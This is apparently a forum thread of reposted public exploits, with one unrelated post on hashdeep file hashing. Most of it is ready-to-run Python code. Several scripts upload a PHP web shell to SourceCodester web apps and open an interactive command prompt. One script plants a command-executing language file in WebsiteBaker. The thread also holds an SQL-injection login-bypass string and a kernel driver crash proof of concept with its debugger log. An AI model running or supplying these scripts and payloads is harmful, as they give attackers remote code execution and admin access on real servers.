# Exploit Title: Online Food Ordering System 2.0 - Remote Code Execution (RCE) (Unauthenticated) # Exploit Author: Abdullah Khawaja (hax.3xploit) # Date: 2021-09-20 # Vendor Homepage: https://www.sourcecodester.com/php/14951/online-food-ordering-system-php-and-sqlite-database-free-source-code.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/online_ordering.zip # Version: 2.0 # Tested On: Kali Linux, Windows 10 + XAMPP 7.4.4 # Description: Online Food Ordering System 2.0 suffers from an Unauthenticated File Upload Vulnerability allowing Remote Attackers to gain Remote Code Execution (RCE) on the Hosting Webserver via uploading a maliciously crafted PHP file that bypasses the image upload filters. # Exploit Details: # 1. Access the 'admin/ajax.php', as it does not check for an authenticated user session. # 2. Set the 'action' parameter of the POST request to 'save_settings'. # - `ajax.php?action=save_settings` # 3. Capture request in burp and replace with with following request. ''' POST /fos/admin/ajax.php?action=save_settings HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------120025571041714278883588636251 Content-Length: 754 Origin: http://localhost Connection: close Referer: http://localhost/fos/admin/index.php?page=site_settings Cookie: PHPSESSID=nbt4d6o8udue0v82bvasfjkm90 Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin -----------------------------120025571041714278883588636251 Content-Disposition: form-data; name="name" adsa -----------------------------120025571041714278883588636251 Content-Disposition: form-data; name="email" asdsad@asda.com -----------------------------120025571041714278883588636251 Content-Disposition: form-data; name="contact" asdsad -----------------------------120025571041714278883588636251 Content-Disposition: form-data; name="about" asdsad -----------------------------120025571041714278883588636251 Content-Disposition: form-data; name="img"; filename="phpinfo.php" Content-Type: application/octet-stream <?php echo phpinfo();?> -----------------------------120025571041714278883588636251-- ''' # ` Image uploader is renaming your payload using the following function. # strtotime(date('y-m-d H:i')).'_'.$_FILES['img']['name']; # you can simply go to any online php compile website like https://www.w3schools.com/php/phptryit.asp?filename=tryphp_compiler # and print this function to get the value. e.g: <?php echo strtotime(date('y-m-d H:i')); ?> Output: 1632085200 # concate output with your playload name like this 1632085200_phpinfo.php # 4. Communicate with the webshell at '/assets/img/1632085200_phpinfo.php?cmd=dir' using GET Requests. # RCE via executing exploit: # Step 1: run the exploit in python with this command: python3 OFOS_v2.0.py # Step 2: Input the URL of the vulnerable application: Example: http://localhost/fos/ import requests, sys, urllib, re import datetime from colorama import Fore, Back, Style requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning) header = Style.BRIGHT+Fore.RED+' '+Fore.RED+' Abdullah '+Fore.RED+'"'+Fore.RED+'hax.3xploit'+Fore.RED+'"'+Fore.RED+' Khawaja\n'+Style.RESET_ALL print(Style.BRIGHT+" Online Food Ordering System v2.0") print(Style.BRIGHT+" Unauthenticated Remote Code Execution"+Style.RESET_ALL) print(header) print(r""" ______ _______ ________ ___ //_/__ /_______ ___ _______ ______(_)_____ _ __ ,< __ __ \ __ `/_ | /| / / __ `/____ /_ __ `/ _ /| | _ / / / /_/ /__ |/ |/ // /_/ /____ / / /_/ / /_/ |_| /_/ /_/\__,_/ ____/|__/ \__,_/ ___ / \__,_/ /___/ abdullahkhawaja.com """) GREEN = '\033[32m' # Green Text RED = '\033[31m' # Red Text RESET = '\033[m' # reset to the defaults #proxies = {'http': 'http://127.0.0.1:8080', 'https': 'https://127.0.0.1:8080'} #Create a new session s = requests.Session() #Set Cookie cookies = {'PHPSESSID': 'd794ba06fcba883d6e9aaf6e528b0733'} LINK=input("Enter URL of The Vulnarable Application : ") def webshell(LINK, session): try: WEB_SHELL = LINK+'/assets/img/'+filename getdir = {'cmd': 'echo %CD%'} r2 = session.get(WEB_SHELL, params=getdir, verify=False) status = r2.status_code if status != 200: print (Style.BRIGHT+Fore.RED+"[!] "+Fore.RESET+"Could not connect to the webshell."+Style.RESET_ALL) r2.raise_for_status() print(Fore.GREEN+'[+] '+Fore.RESET+'Successfully connected to webshell.') cwd = re.findall('[CDEF].*', r2.text) cwd = cwd[0]+"> " term = Style.BRIGHT+Fore.GREEN+cwd+Fore.RESET while True: thought = input(term) command = {'cmd': thought} r2 = requests.get(WEB_SHELL, params=command, verify=False) status = r2.status_code if status != 200: r2.raise_for_status() response2 = r2.text print(response2) except: print("\r\nExiting.") sys.exit(-1) #Creating a PHP Web Shell phpshell = { 'img': ( 'shell.php', '<?php echo shell_exec($_REQUEST["cmd"]); ?>', 'application/octet-stream', {'Content-Disposition': 'form-data'} ) } # Defining value for form data data = {'name':'test', 'email':'info@sample.com', 'contact':'+6948 8542 623','about':'hello world'} def id_generator(): x = datetime.datetime.now() date_string = x.strftime("%y-%m-%d %H:%M") date = datetime.datetime.strptime(date_string, "%y-%m-%d %H:%M") timestamp = datetime.datetime.timestamp(date) file = int(timestamp) final_name = str(file)+'_shell.php' return final_name filename = id_generator() #Uploading Reverse Shell print("[*]Uploading PHP Shell For RCE...") upload = s.post(LINK+'admin/ajax.php?action=save_settings', cookies=cookies, files=phpshell, data=data) shell_upload = True if("1" in upload.text) else False u=shell_upload if u: print(GREEN+"[+]PHP Shell has been uploaded successfully!", RESET) else: print(RED+"[-]Failed To Upload The PHP Shell!", RESET) #Executing The Webshell webshell(LINK, s)

Thursday at 04:57 PM4 days

# Exploit Title: Budget and Expense Tracker System 1.0 - Remote Code Execution (RCE) (Unauthenticated) # Exploit Author: Abdullah Khawaja (hax.3xploit) # Date: 2021-09-21 # Vendor Homepage: https://www.sourcecodester.com/php/14893/budget-and-expense-tracker-system-php-free-source-code.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/expense_budget.zip # Version: 2.0 # Tested On: Kali Linux, Windows 10 + XAMPP 7.4.4 # Description: Budget and Expense Tracker System 1.0 suffers from an Unauthenticated File Upload Vulnerability allowing Remote Attackers to gain Remote Code Execution (RCE) on the Hosting Webserver via uploading a maliciously crafted PHP file that bypasses the image upload filters. # RCE via executing exploit: # Step 1: run the exploit in python with this command: python3 BMAETS_v1.0.py # Step 2: Input the URL of the vulnerable application: Example: http://localhost/expense_budget/ import requests, sys, urllib, re import datetime from colorama import Fore, Back, Style requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning) header = Style.BRIGHT+Fore.RED+' '+Fore.RED+' Abdullah '+Fore.RED+'"'+Fore.RED+'hax.3xploit'+Fore.RED+'"'+Fore.RED+' Khawaja\n'+Style.RESET_ALL print(Style.BRIGHT+" Budget and Expense Tracker System 1.0") print(Style.BRIGHT+" Unauthenticated Remote Code Execution"+Style.RESET_ALL) print(header) print(r""" ______ _______ ________ ___ //_/__ /_______ ___ _______ ______(_)_____ _ __ ,< __ __ \ __ `/_ | /| / / __ `/____ /_ __ `/ _ /| | _ / / / /_/ /__ |/ |/ // /_/ /____ / / /_/ / /_/ |_| /_/ /_/\__,_/ ____/|__/ \__,_/ ___ / \__,_/ /___/ abdullahkhawaja.com """) GREEN = '\033[32m' # Green Text RED = '\033[31m' # Red Text RESET = '\033[m' # reset to the defaults proxies = {'http': 'http://127.0.0.1:8080', 'https': 'https://127.0.0.1:8080'} #Create a new session s = requests.Session() #Set Cookie cookies = {'PHPSESSID': 'd794ba06fcba883d6e9aaf6e528b0733'} LINK=input("Enter URL of The Vulnarable Application : ") def webshell(LINK, session): try: WEB_SHELL = LINK+'/uploads/'+filename getdir = {'cmd': 'echo %CD%'} r2 = session.get(WEB_SHELL, params=getdir, verify=False, proxies=proxies) status = r2.status_code if status != 200: print (Style.BRIGHT+Fore.RED+"[!] "+Fore.RESET+"Could not connect to the webshell."+Style.RESET_ALL) r2.raise_for_status() print(Fore.GREEN+'[+] '+Fore.RESET+'Successfully connected to webshell.') cwd = re.findall('[CDEF].*', r2.text) cwd = cwd[0]+"> " term = Style.BRIGHT+Fore.GREEN+cwd+Fore.RESET while True: thought = input(term) command = {'cmd': thought} r2 = requests.get(WEB_SHELL, params=command, verify=False) status = r2.status_code if status != 200: r2.raise_for_status() response2 = r2.text print(response2) except: print("\r\nExiting.") sys.exit(-1) #Creating a PHP Web Shell phpshell = { 'img': ( 'shell.php', '<?php echo shell_exec($_REQUEST["cmd"]); ?>', 'application/octet-stream', {'Content-Disposition': 'form-data'} ) } # Defining value for form data data = {'name':'Budget and Expense Tracker System - PHP', 'short_name':'B&E Tracker'} def id_generator(): x = datetime.datetime.now() date_string = x.strftime("%y-%m-%d %H:%M") date = datetime.datetime.strptime(date_string, "%y-%m-%d %H:%M") timestamp = datetime.datetime.timestamp(date) file = int(timestamp) final_name = str(file)+'_shell.php' return final_name filename = id_generator() #Uploading Reverse Shell print("[*]Uploading PHP Shell For RCE...") upload = s.post(LINK+'classes/SystemSettings.php?f=update_settings', cookies=cookies, files=phpshell, data=data, proxies=proxies) shell_upload = True if("1" in upload.text) else False u=shell_upload if u: print(GREEN+"[+]PHP Shell has been uploaded successfully!", RESET) else: print(RED+"[-]Failed To Upload The PHP Shell!", RESET) #Executing The Webshell webshell(LINK, s)

Thursday at 04:57 PM4 days

We download files on the Internet, and sometimes we often see that the author of the file will attach the program's md5 value. The purpose is to allow users to compare the md5 value of the downloaded files. If the MD5 value of the file you download does not match the original author's provided, it means that the file has been modified by someone else. If it is a program, it is possible that someone else has joined a malicious backdoor. The computer uses multiple hashes or message digests for any number of files. At the same time, you can choose to mine the directory structure recursively. By default, the program calculates MD5 and SHA-256 hashes, equivalent to -c md5, sha256. It can also use a known hash list to audit a set of files. Errors will be reported as standard errors. If no files are specified, read from standard input. Using hashdeep file name After modifying the file, look at the md5 value It can be found that the change from b29d0b8948ed59333490babc1f85442b,040e81279652e493b4ab629446bda08181125a61fbec94997187dc892844a239 has become 02fd2f0ba1c6d6911c9b7eb7c443629b,c2912e30e8eb731c0373d83af1046ca21d79acc452bb1a986844b26424d93b69 Other parameters -c: Mode. Use the specified algorithm to calculate the hash of the file. Support md5, sha1, sha256, tiger and whirlpool. -r: Enable recursive mode. Iterate through all subdirectories. Note that recursive mode cannot be used to check all files with a given file extension. For example, calling hashdeep -r *.txt will check all files in a directory ending in .txt. -v : Enable detailed mode. Use again to make the program more detailed.

Thursday at 04:57 PM4 days

# Exploit Title: WebsiteBaker 2.13.0 - Remote Code Execution (RCE) (Authenticated) # Date: 18-09-2021 # Exploit Author: Halit AKAYDIN (hLtAkydn) # Vendor Homepage: https://websitebaker.org/ # Software Link: http://wiki.websitebaker.org/doku.php/en/downloads # Version: 2.13.0 # Category: Webapps # Tested on: Linux/Windows # WebsiteBaker Open Source Content Management # Includes an endpoint that allows remote access # Language page misconfigured, causing vulnerability # User information with sufficient permissions is required. # I had to write a long script to bypass some security measures. # Example: python3 exploit.py -u http://example.com -l admin -p Admin123 # python3 exploit.py -h from bs4 import BeautifulSoup from time import sleep import requests import argparse def main(): parser = argparse.ArgumentParser( description='WebsiteBaker 2.13.0 - Remote Code Execution (RCE) (Authenticated)' ) parser.add_argument('-u', '--host', type=str, required=True) parser.add_argument('-l', '--login', type=str, required=True) parser.add_argument('-p', '--password', type=str, required=True) args = parser.parse_args() print("\nWebsiteBaker 2.13.0 - Remote Code Execution (RCE) (Authenticated)", "\nExploit Author: Halit AKAYDIN (hLtAkydn)\n") sleep(2) find_default(args) def find_default(args): #Check http or https if args.host.startswith(('http://', 'https://')): print("[?] Check Url...\n") args.host = args.host if args.host.endswith('/'): args.host = args.host[:-1] sleep(2) else: print("\n[?] Check Adress...\n") args.host = "http://" + args.host args.host = args.host if args.host.endswith('/'): args.host = args.host[:-1] sleep(2) # Check Host Status try: response = requests.get(args.host) if response.status_code != 200: print("[-] Address not reachable!\n") sleep(2) exit(1) except requests.ConnectionError as exception: print("[-] Address not reachable!\n") sleep(2) exit(1) exploit(args) url = args.host + "/admin/login/index.php" headers = { "Upgrade-Insecure-Requests": "1", "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Referer": args.host + "/admin/addons/index.php", "Accept-Encoding": "gzip, deflate", "Accept-Language": "en-US,en;q=0.9", "Connection": "close" } response = requests.get(url, headers=headers) for cookie in response.cookies: phpsessid_name = cookie.name soup = BeautifulSoup(response.text, 'html.parser') input_hidden_username = (soup.find_all("input", type="hidden")[1].get("value")) input_hidden_password = (soup.find_all("input", type="hidden")[2].get("value")) input_hidden_name = (soup.find_all("input", type="hidden")[3].get("name")) input_hidden_value = (soup.find_all("input", type="hidden")[3].get("value")) login(args, phpsessid_name, input_hidden_username, input_hidden_password, input_hidden_name, input_hidden_value) def login(args, phpsessid_name, input_hidden_username, input_hidden_password, input_hidden_name, input_hidden_value): session = requests.session() url = args.host + "/admin/login/index.php" cookies = { "klaro": "{'klaro':true,'mathCaptcha':true}" } headers = { "Cache-Control": "max-age=0", "Upgrade-Insecure-Requests": "1", "Origin": args.host, "Content-Type": "application/x-www-form-urlencoded", "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Referer": args.host + "/admin/login/index.php", "Accept-Encoding": "gzip, deflate", "Accept-Language": "en-US,en;q=0.9", "Connection": "close" } data = { "url": '', "username_fieldname": input_hidden_username, "password_fieldname": input_hidden_password, input_hidden_name: input_hidden_value, input_hidden_username : args.login, input_hidden_password : args.password, "submit": '' } response = session.post(url, headers=headers, cookies=cookies, data=data, allow_redirects=False) new_cookie = (response.cookies.get(phpsessid_name)) if response.headers.get("Location") == args.host + "/admin/start/index.php": print("[+] Success Login...\n") sleep(2) check_pers(args, phpsessid_name, new_cookie) else: print("[-] Login Failed...\n") print("Your username or password is incorrect.") sleep(2) def check_pers(args, phpsessid_name, new_cookie): url = args.host + "/admin/languages/install.php" cookies = { "klaro": "{'klaro':true,'mathCaptcha':true}", phpsessid_name : new_cookie } headers = { "Cache-Control": "max-age=0", "Upgrade-Insecure-Requests": "1", "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Accept-Encoding": "gzip, deflate", "Accept-Language": "en-US,en;q=0.9", "Connection": "close" } response = requests.get(url, headers=headers, cookies=cookies) soup = BeautifulSoup(response.text, 'html.parser') if (soup.find_all("title")[0].text == "Enter your website title » Administration - Add-ons"): find_token(args, phpsessid_name, new_cookie) else: print("[!] Unauthorized user!\n\n") print("Requires user with language editing permissions.") sleep(2) exit(1) def find_token(args, phpsessid_name, new_cookie): url = args.host + "/admin/languages/index.php" cookies = { "klaro": "{'klaro':true,'mathCaptcha':true}", phpsessid_name : new_cookie } headers = { "Cache-Control": "max-age=0", "Upgrade-Insecure-Requests": "1", "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Accept-Encoding": "gzip, deflate", "Accept-Language": "en-US,en;q=0.9", "Connection": "close" } response = requests.get(url, headers=headers, cookies=cookies) soup = BeautifulSoup(response.text, 'html.parser') token_hidden_name = soup.find_all("input", type="hidden")[5].get("name") token_hidden_value = soup.find_all("input", type="hidden")[5].get("value") if soup.find_all("option")[1].text == "": exploit(args) elif soup.find_all("option")[20].text == "Türkçe": token_lang = soup.find_all("option")[20].get("value") uninstall_lang(args, phpsessid_name, new_cookie, token_hidden_name, token_hidden_value, token_lang) else: install_lang(args, phpsessid_name, new_cookie, token_hidden_name, token_hidden_value) pass def install_lang(args, phpsessid_name, new_cookie, token_hidden_name, token_hidden_value): url = args.host + "/admin/languages/install.php" cookies = { "klaro": "{'klaro':true,'mathCaptcha':true}", phpsessid_name: new_cookie } headers = { "Cache-Control": "max-age=0", "Upgrade-Insecure-Requests": "1", "Origin": args.host, "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryCyjXuM2KSAsqjze1", "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Referer": args.host + "/admin/languages/index.php", "Accept-Encoding": "gzip, deflate", "Accept-Language": "en-US,en;q=0.9", "Connection": "close" } data = "------WebKitFormBoundaryCyjXuM2KSAsqjze1\r\nContent-Disposition: form-data; name=\"action\"\r\n\r\ninstall\r\n------WebKitFormBoundaryCyjXuM2KSAsqjze1\r\nContent-Disposition: form-data; name=\"advanced\"\r\n\r\n\r\n------WebKitFormBoundaryCyjXuM2KSAsqjze1\r\nContent-Disposition: form-data; name=\""+token_hidden_name+"\"\r\n\r\n"+token_hidden_value+"\r\n------WebKitFormBoundaryCyjXuM2KSAsqjze1\r\nContent-Disposition: form-data; name=\"userfile\"; filename=\"TR.php\"\r\nContent-Type: application/x-php\r\n\r\n<?php system($_GET['cmd']); ?>\n\r\n------WebKitFormBoundaryCyjXuM2KSAsqjze1\r\nContent-Disposition: form-data; name=\"submit\"\r\n\r\nInstall\r\n------WebKitFormBoundaryCyjXuM2KSAsqjze1\r\nContent-Disposition: form-data; name=\"overwrite\"\r\n\r\ntrue\r\n------WebKitFormBoundaryCyjXuM2KSAsqjze1--\r\n" response = requests.post(url, headers=headers, cookies=cookies, data=data) soup = BeautifulSoup(response.text, 'html.parser') # print(soup.find_all("div", class_="w3-text-grey w3--medium")) print("[!] Installing Vuln Lang File!\n") sleep(2) find_token(args, phpsessid_name, new_cookie) def uninstall_lang(args, phpsessid_name, new_cookie, token_hidden_name, token_hidden_value, token_lang): url = args.host + "/admin/languages/uninstall.php" cookies = { "klaro": "{'klaro':true,'mathCaptcha':true}", phpsessid_name: new_cookie } headers = { "Cache-Control": "max-age=0", "Upgrade-Insecure-Requests": "1", "Origin": args.host, "Content-Type": "application/x-www-form-urlencoded", "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Referer": args.host + "/admin/languages/index.php", "Accept-Encoding": "gzip, deflate", "Accept-Language": "en-US,en;q=0.9", "Connection": "close" } data = { "action": "uninstall", "advanced": '', token_hidden_name : token_hidden_value, "file": token_lang, "submit": "Uninstall" } response = requests.post(url, headers=headers, cookies=cookies, data=data) soup = BeautifulSoup(response.text, 'html.parser') print("[!] Uninstall Lang File!\n") # print(soup.find_all("div", class_="w3-text-grey w3--medium")) sleep(2) find_token(args, phpsessid_name, new_cookie) def exploit(args): response = requests.get(args.host + "/languages/TR.php?cmd=whoami") if response.status_code == 200: print("[*] Exploit File Exists!\n") sleep(2) print("[+] Exploit Done!\n") sleep(2) while True: cmd = input("$ ") url = args.host + "/languages/TR.php?cmd=" + cmd headers = { "Upgrade-Insecure-Requests": "1", "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0" } response = requests.post(url, headers=headers, timeout=5) if response.text == "": print(cmd + ": command not found\n") else: print(response.text) if __name__ == '__main__': main()

Thursday at 04:57 PM4 days

# Exploit Title: Budget and Expense Tracker System 1.0 - Authenticated Bypass # Exploit Author: Prunier Charles-Yves # Date: September 20, 2021 # Vendor Homepage: https://www.sourcecodester.com/php/14893/budget-and-expense-tracker-system-php-free-source-code.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/expense_budget.zip # Tested on: Linux, windows # Vendor: oretnom23 # Version: v1.0 # Exploit Description: Budget and Expense Tracker System 1.0, is prone to an Easy authentication bypass vulnerability on the application allowing the attacker to login with admin acount ----- PoC: Authentication Bypass ----- Administration Panel: http://localhost/expense_budget/admin/login.php Username: admin' or ''=' --

Thursday at 04:57 PM4 days

# Exploit Title: Church Management System 1.0 - Remote Code Execution (RCE) (Unauthenticated) # Exploit Author: Abdullah Khawaja # Date: 2021-09-20 # Vendor Homepage: https://www.sourcecodester.com/php/14949/church-management-system-cms-website-using-php-source-code.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/church_management_1.zip # Version: 1.0 # Tested On: Kali Linux, Windows 10 + XAMPP 7.4.4 # Description: Church Management System (CMS-Website) 1.0 suffers from an Unauthenticated File Upload Vulnerability allowing Remote Attackers to gain Remote Code Execution (RCE) on the Hosting Webserver via uploading a maliciously crafted PHP file that bypasses the image upload filters. # Exploit Details: # 1. Access the 'classes/Users.php', as it does not check for an authenticated user session. # 2. Set the 'f' parameter of the POST request to 'save'. # - `Users.php?f=save` # 3. Capture request in burp and replace with with following request. ''' POST /church_management/classes/Users.php?f=save HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------91105564325608762312322546550 Content-Length: 859 Origin: http://localhost Connection: close Referer: http://localhost/church_management/admin/?page=user Cookie: PHPSESSID=nbt4d6o8udue0v82bvasfjkm90 Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin -----------------------------91105564325608762312322546550 Content-Disposition: form-data; name="id" 1 -----------------------------91105564325608762312322546550 Content-Disposition: form-data; name="firstname" Adminstrator -----------------------------91105564325608762312322546550 Content-Disposition: form-data; name="lastname" Admin -----------------------------91105564325608762312322546550 Content-Disposition: form-data; name="username" admin -----------------------------91105564325608762312322546550 Content-Disposition: form-data; name="password" -----------------------------91105564325608762312322546550 Content-Disposition: form-data; name="img"; filename="phpinfo.php" Content-Type: application/octet-stream <?php echo phpinfo(); ?> -----------------------------91105564325608762312322546550-- ''' # ` Image uploader is renaming your payload using the following function. # strtotime(date('y-m-d H:i')).'_'.$_FILES['img']['name']; # you can simply go to any online php compile website like https://www.w3schools.com/php/phptryit.asp?filename=tryphp_compiler # and print this function to get the value. e.g: <?php echo strtotime(date('y-m-d H:i')); ?> Output: 1632085200 # concate output with your playload name like this 1632085200_phpinfo.php # 4. Communicate with the webshell at 'uploads/1632085200_phpinfo.php?cmd=dir' using GET Requests. # RCE via executing exploit: # Step 1: run the exploit in python with this command: python3 CMS-RCEv1.0.py # Step 2: Input the URL of the vulnerable application: Example: http://localhost/church_management/ import requests, sys, urllib, re import datetime from colorama import Fore, Back, Style requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning) header = Style.BRIGHT+Fore.RED+' '+Fore.RED+' Abdullah '+Fore.RED+'"'+Fore.RED+'hax.3xploit'+Fore.RED+'"'+Fore.RED+' Khawaja\n'+Style.RESET_ALL print(Style.BRIGHT+" Church Management System v1.0") print(Style.BRIGHT+" Unauthenticated Remote Code Execution"+Style.RESET_ALL) print(header) print(r""" .----------. .-''-. / / . __ __ ___ .' .-. ) / ______.' .'| | |/ `.' `. / .' / / / /_ .' | | .-. .-. ' (_/ / / / '''--. < | __ __ | | | | | | ,.----------. / / '___ `. | | ____ .:--.'. .:--.'. | | | | | |// \ / / `'. | | | \ .' / | \ | / | \ || | | | | |\\ /. ' ) | | |/ . `" __ | | `" __ | || | | | | | `'----------'/ / _.-')......-' / | /\ \ .'.''| | .'.''| ||__| |__| |__| .' ' _.'.-'' \ _..'` | | \ \ / / | |_/ / | |_ / /.-'_.' '------''' ' \ \ \ \ \._,\ '/\ \._,\ '/ / _.' '------' '---'`--' `" `--' `" ( _.-' abdullahkhawaja.com """) GREEN = '\033[32m' # Green Text RED = '\033[31m' # Red Text RESET = '\033[m' # reset to the defaults #Create a new session #proxies = {'http': 'http://127.0.0.1:8080', 'https': 'https://127.0.0.1:8080'} s = requests.Session() #Set Cookie cookies = {'PHPSESSID': 'd794ba06fcba883d6e9aaf6e528b0733'} LINK=input("Enter URL of The Vulnarable Application : ") def webshell(LINK, session): try: WEB_SHELL = LINK+'uploads/'+filename getdir = {'cmd': 'echo %CD%'} r2 = session.get(WEB_SHELL, params=getdir, verify=False) status = r2.status_code if status != 200: print (Style.BRIGHT+Fore.RED+"[!] "+Fore.RESET+"Could not connect to the webshell."+Style.RESET_ALL) r2.raise_for_status() print(Fore.GREEN+'[+] '+Fore.RESET+'Successfully connected to webshell.') cwd = re.findall('[CDEF].*', r2.text) cwd = cwd[0]+"> " term = Style.BRIGHT+Fore.GREEN+cwd+Fore.RESET while True: thought = input(term) command = {'cmd': thought} r2 = requests.get(WEB_SHELL, params=command, verify=False) status = r2.status_code if status != 200: r2.raise_for_status() response2 = r2.text print(response2) except: print("\r\nExiting.") sys.exit(-1) #Creating a PHP Web Shell phpshell = { 'img': ( 'shell.php', '<?php echo shell_exec($_REQUEST["cmd"]); ?>', 'application/octet-stream', {'Content-Disposition': 'form-data'} ) } # Defining value for form data data = {'id':'1', 'firstname':'Adminstrator', 'lastname':'Admin','username':'admin','password':''} def id_generator(): x = datetime.datetime.now() date_string = x.strftime("%y-%m-%d %H:%M") date = datetime.datetime.strptime(date_string, "%y-%m-%d %H:%M") timestamp = datetime.datetime.timestamp(date) file = int(timestamp) final_name = str(file)+'_shell.php' return final_name filename = id_generator() #Uploading Reverse Shell print("[*]Uploading PHP Shell For RCE...") upload = s.post(LINK+'classes/Users.php?f=save', cookies=cookies, files=phpshell, data=data) shell_upload = True if("Undefined index: id in" in upload.text) else False u=shell_upload if u: print(GREEN+"[+]PHP Shell has been uploaded successfully!", RESET) else: print(RED+"[-]Failed To Upload The PHP Shell!", RESET) #Executing The Webshell webshell(LINK, s)

Thursday at 04:57 PM4 days

# Exploit Title: Yenkee Hornet Gaming Mouse - 'GM312Fltr.sys' Denial of Service (PoC) # Date: 2021/04/07 # Exploit Author: Quadron Research Lab # Version: all version # Tested on: Windows 10 x64 HUN/ENG Professional # Vendor: https://www.yenkee.eu/gaming-mouse-hornet-aim/yms-3029 # Reference: https://github.com/Quadron-Research-Lab/Kernel_Driver_bugs/tree/main/GM312Fltr import ctypes, sys from ctypes import * import io from itertools import product from sys import argv devicename = "GM312Fltr" ioctl = 0x22245C ioctl_list = ''' 0x22245C 0x222440 0x222441 0x222400 0x222404 0x222408 0x222420 0x222424 0x222448 0x222450 0x22245c 0x222460 ''' kernel32 = windll.kernel32 hevDevice = kernel32.CreateFileA("\\\\.\\GM312Fltr", 0xC0000000, 0, None, 0x3, 0, None) if not hevDevice or hevDevice == -1: print ("Not Win! Sorry!") else: print ("OPENED!") buf = 'A' * 2000 bufLength = 2000 kernel32.DeviceIoControl(hevDevice, ioctl, buf, bufLength, None, 0, byref(c_ulong()), None) [Bugcheck Analysis] Fatal System Error 0x000000f7 (0xBEBEA1CAEAF0A2C1,0x0000F80736BC1742,0xFFFF07F8C943E8BD,0x0000000000000000) Break instruction exception - code 80000003 (first chance) nt!DbgBreakPointWithStatus fffff807`2e1feb90 cc int 3 0 kd !analyze Connected to Windows 10 19041 x64 target at (Mon Jun 14 204816.370 2021 (UTC + 200)), ptr64 TRUE Loading Kernel Symbols ............................................................... ................................................................ ........................ Press ctrl-c (cdb, kd, ntsd) or ctrl-break (windbg) to abort symbol loads that take too long. Run !sym noisy before .reload to track down problems loading symbols. ........................................ ............................. Loading User Symbols ............................................. Loading unloaded module list ........ Bugcheck Analysis DRIVER_OVERRAN_STACK_BUFFER (f7) A driver has overrun a stack-based buffer. This overrun could potentially allow a malicious user to gain control of this machine. DESCRIPTION A driver overran a stack-based buffer (or local variable) in a way that would have overwritten the function's return address and jumped back to an arbitrary address when the function returned. This is the classic buffer overrun hacking attack and the system has been brought down to prevent a malicious user from gaining complete control of it. Do a kb to get a stack backtrace -- the last routine on the stack before the buffer overrun handlers and bugcheck call is the one that overran its local variable(s). Arguments Arg1 bebea1caeaf0a2c1, Actual security check cookie from the stack Arg2 0000f80736bc1742, Expected security check cookie Arg3 ffff07f8c943e8bd, Complement of the expected security check cookie Arg4 0000000000000000, zero Debugging Details ------------------ BUGCHECK_CODE f7 BUGCHECK_P1 bebea1caeaf0a2c1 BUGCHECK_P2 f80736bc1742 BUGCHECK_P3 ffff07f8c943e8bd BUGCHECK_P4 0 PROCESS_NAME pythonw.exe SYMBOL_NAME GM312Fltr+e1e MODULE_NAME GM312Fltr IMAGE_NAME GM312Fltr.sys FAILURE_BUCKET_ID 0xF7_MISSING_GSFRAME_STACKPTR_ERROR_GM312Fltr!unknown_function FAILURE_ID_HASH {b8e05604-2a11-789a-ad29-fc4916710f2d} Followup MachineOwner --------- 0 kd kb RetAddr Args to Child Call Site fffff807`2e312d12 fffff807`344a4ae0 fffff807`2e17d000 00000000`00000000 00000000`00000000 nt!DbgBreakPointWithStatus fffff807`2e3122f6 00000000`00000003 fffff807`344a4ae0 fffff807`2e20bbc0 00000000`000000f7 nt!KiBugCheckDebugBreak+0x12 fffff807`2e1f6df7 fffff807`344a5210 00000000`00000000 fffff807`36bc18c8 fffff807`344a51a8 nt!KeBugCheck2+0x946 fffff807`36bc0e1e 00000000`000000f7 bebea1ca`eaf0a2c1 0000f807`36bc1742 